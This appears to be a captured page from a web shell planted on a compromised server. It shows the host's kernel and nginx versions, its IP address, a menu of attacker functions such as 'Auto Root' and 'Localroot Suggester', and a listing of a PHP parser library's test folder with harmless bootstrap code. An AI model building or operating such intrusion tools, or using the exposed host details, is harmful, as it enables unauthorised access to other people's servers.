Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.219.197.162
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-test /
vendor /
nikic /
php-parser /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
PhpParser
[ DIR ]
drwxr-xr-x
2018-10-10 09:24
code
[ DIR ]
drwxr-xr-x
2018-10-10 09:24
bootstrap.php
893
B
-rw-r--r--
2018-10-10 09:24
updateTests.php
1.1
KB
-rw-r--r--
2018-10-10 09:24
Save
Rename
<?php namespace PhpParser; require __DIR__ . '/../vendor/autoload.php'; function canonicalize($str) { // normalize EOL style $str = str_replace("\r\n", "\n", $str); // trim newlines at end $str = rtrim($str, "\n"); // remove trailing whitespace on all lines $lines = explode("\n", $str); $lines = array_map(function($line) { return rtrim($line, " \t"); }, $lines); return implode("\n", $lines); } function filesInDir($directory, $fileExtension) { $directory = realpath($directory); $it = new \RecursiveDirectoryIterator($directory); $it = new \RecursiveIteratorIterator($it, \RecursiveIteratorIterator::LEAVES_ONLY); $it = new \RegexIterator($it, '(\.' . preg_quote($fileExtension) . '$)'); foreach ($it as $file) { $fileName = $file->getPathname(); yield $fileName => file_get_contents($fileName); } }